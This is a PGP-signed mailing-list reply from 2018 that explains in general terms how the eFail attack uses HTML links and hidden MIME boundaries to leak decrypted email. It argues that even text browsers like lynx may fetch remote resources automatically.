-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, Jun 29, 2018 at 10:05:47AM +0200, Aldo Maggi wrote:
> Ok, I understand your point, but, I wonder, are you using just lynx or
> links2 for going on Internet? The problems you correctly point out are
> not the same with Chromium, Firefox etc.?
I wouldn't be so sure about lynx et al. Here [1] is a rough but readable
explanation on how eFail works. There are two components into it: (1)
a format like HTML, in which the client possibly follows links without
user interaction (more on that below) and (2) how to bury a MIME
boundary within HTML's baroque syntax so that for the HTML parser,
the whole (now decrypted) message forms part of that link, which will
be "given" readily to a server out there, waiting to harvest it.
More on (1): the example uses an img tag. You might argue that HTML
capable mail readers have learnt these days to not follow automatically
img tags (on privacy grounds), but there is a multitude of other links
which might be followed automatically: CSS, iframes...
Are you sure your l{ynx,inks} doesn't download any of them? Do you know
by heart all of those? Do you even know where to look them up? [2]
I for one wouldn't know better than to look into lynx/links source
code. Good luck with that.
Cheers
[1] https://thehackernews.com/2018/05/efail-pgp-email-encryption.html
[2] This isn't to make you look bad: I don't myself either! This is
to drive home the message that "HTML" is a huge, ill-defined mess
of standards, and that all HTML renderers out there have to be
a steaming pile of pragmatism which is practically impossible to
validate.
- -- tomás
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAls18w4ACgkQBcgs9XrR2kbxXQCaA+z9BNrpjkLJUnmhJi5+/d+t
bRMAnjfgq7HjAXqAi66RDMsYNEYYN34L
=CSa/
-----END PGP SIGNATURE-----
